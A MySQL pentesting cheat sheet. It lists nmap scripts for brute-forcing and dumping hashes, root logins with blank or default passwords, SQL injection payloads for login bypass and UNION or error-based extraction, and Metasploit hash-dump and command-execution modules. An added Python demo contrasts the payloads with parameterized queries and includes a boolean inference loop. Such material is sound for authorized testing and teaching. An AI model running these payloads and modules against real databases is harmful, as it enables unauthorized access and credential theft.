3306 - Pentesting MySQL
Scan
nmap
nmap -p 3306 --script=mysql-enum $IP
nmap -p 3306 --script=mysql-audit $IP
nmap -p 3306 --script=mysql-brute $IP
nmap -p 3306 --script=mysql-databases $IP
nmap -p 3306 --script=mysql-dump-hashes $IP
nmap -p 3306 --script=mysql-empty-password $IP
nmap -p 3306 --script=mysql-info $IP
nmap -p 3306 --script=mysql-query $IP
nmap -p 3306 --script=mysql-users $IP
nmap -p 3306 --script=mysql-variables $IP
nmap -p 3306 --script=mysql-vuln-cve2012-2122 $IP
Connect
install mysql client
mysql -u root              # Connect as root without a password (add -h $IP to reach a remote host)
mysql -u root -p           # Prompts for the password interactively
mysql --user=root --password=password
Bruteforce
medusa
hydra
SQL Injection
x' or 1=1 -- x
x' or (1=1 and username='admin') -- x
x' or (1=1 and (SELECT count(*) FROM users) = 1) -- x
x'; SELECT CAST(password AS DATE) FROM users; -- x
SELECT null,GROUP_CONCAT(DISTINCT CONCAT(table_name)),null FROM information_schema.tables WHERE table_schema = 'sqli_one' -- UNION-based: the column count (3 here) must match the original query
SELECT null, extractvalue(1, concat('=', (SELECT GROUP_CONCAT(DISTINCT CONCAT(table_name)) FROM information_schema.tables WHERE table_schema = 'sqli_one'))),null -- Error-based: the XPATH syntax error leaks at most 32 characters, so page through long output with SUBSTRING()
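Added example (not from the original cheat sheet): the login payloads above spliced into a string-built query, next to the parameterized form that neutralises them, plus a row-count inference loop built on the third payload's pattern. sqlite3 stands in for MySQL because it ships with Python and handles the `' or ... --` boolean and comment logic the same way; the MySQL-only payloads (information_schema, extractvalue) are not exercised here. The users table and credentials are constructed sample data.

```python
import sqlite3

# Constructed sample table: two accounts with deliberately plaintext passwords.
USERS = [("admin", "S3cret!"), ("alice", "hunter2")]

# Payloads copied verbatim from the cheat sheet above.
PAYLOADS = [
    "x' or 1=1 -- x",
    "x' or (1=1 and username='admin') -- x",
    "x' or (1=1 and (SELECT count(*) FROM users) = 1) -- x",
]


def make_db():
    """In-memory stand-in for the target database (assumption: sqlite3, not MySQL)."""
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE users (username TEXT, password TEXT)")
    con.executemany("INSERT INTO users VALUES (?, ?)", USERS)
    return con


def vulnerable_login(con, username, password):
    """String concatenation: the payload's quote closes the literal, 'or' rewrites
    the WHERE clause and '-- x' comments out the password check."""
    sql = (f"SELECT username FROM users WHERE username = '{username}' "
           f"AND password = '{password}'")
    return [row[0] for row in con.execute(sql).fetchall()]


def safe_login(con, username, password):
    """Parameterized query: the payload is bound as a value and compared as data,
    so it never reaches the SQL parser as grammar."""
    sql = "SELECT username FROM users WHERE username = ? AND password = ?"
    return [row[0] for row in con.execute(sql, (username, password)).fetchall()]


def infer_user_count(con, limit=10):
    """Boolean-based inference using the third payload's shape: the login only
    succeeds when the guessed count equals the real row count."""
    for guess in range(1, limit + 1):
        payload = f"x' or (1=1 and (SELECT count(*) FROM users) = {guess}) -- x"
        if vulnerable_login(con, payload, "irrelevant"):
            return guess
    return None


if __name__ == "__main__":
    db = make_db()
    for p in PAYLOADS:
        print(f"{p!r:60} vulnerable -> {vulnerable_login(db, p, 'wrong')}"
              f"  safe -> {safe_login(db, p, 'wrong')}")
    print("inferred row count:", infer_user_count(db))
```

The first payload returns every account, the second pins the result to admin, and the third only matches when the row count equals the guess; that last behaviour is what turns a login form into a true/false oracle, which `infer_user_count` walks to recover the number of users.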
Functions
Name | Description |
---|---|
BENCHMARK() | Repeatedly execute an expression |
CHARSET() | Return the character set of the argument |
COERCIBILITY() | Return the collation coercibility value of the string argument |
COLLATION() | Return the collation of the string argument |
CONNECTION_ID() | Return the connection ID (thread ID) for the connection |
CURRENT_USER(), CURRENT_USER | The authenticated user name and host name |
DATABASE() | Return the default (current) database name |
FOUND_ROWS() | For a SELECT with a LIMIT clause, the number of rows that would be returned were there no LIMIT clause |
LAST_INSERT_ID() | Value of the AUTOINCREMENT column for the last INSERT |
ROW_COUNT() | The number of rows updated |
SCHEMA() | Synonym for DATABASE() |
SESSION_USER() | Synonym for USER() |
SYSTEM_USER() | Synonym for USER() |
USER() | The user name and host name provided by the client |
VERSION() | Return a string that indicates the MySQL server version |
Enumerate
Metasploit
- msf> use auxiliary/admin/mysql/mysql_sql
- msf> use auxiliary/scanner/mysql/mysql_version
- msf> use auxiliary/scanner/mysql/mysql_authbypass_hashdump
- msf> use auxiliary/scanner/mysql/mysql_hashdump -> Creds
- msf> use auxiliary/admin/mysql/mysql_enum -> Creds
- msf> use auxiliary/scanner/mysql/mysql_schemadump -> Creds
- msf> use exploit/windows/mysql/mysql_start_up -> Execute commands Windows, Creds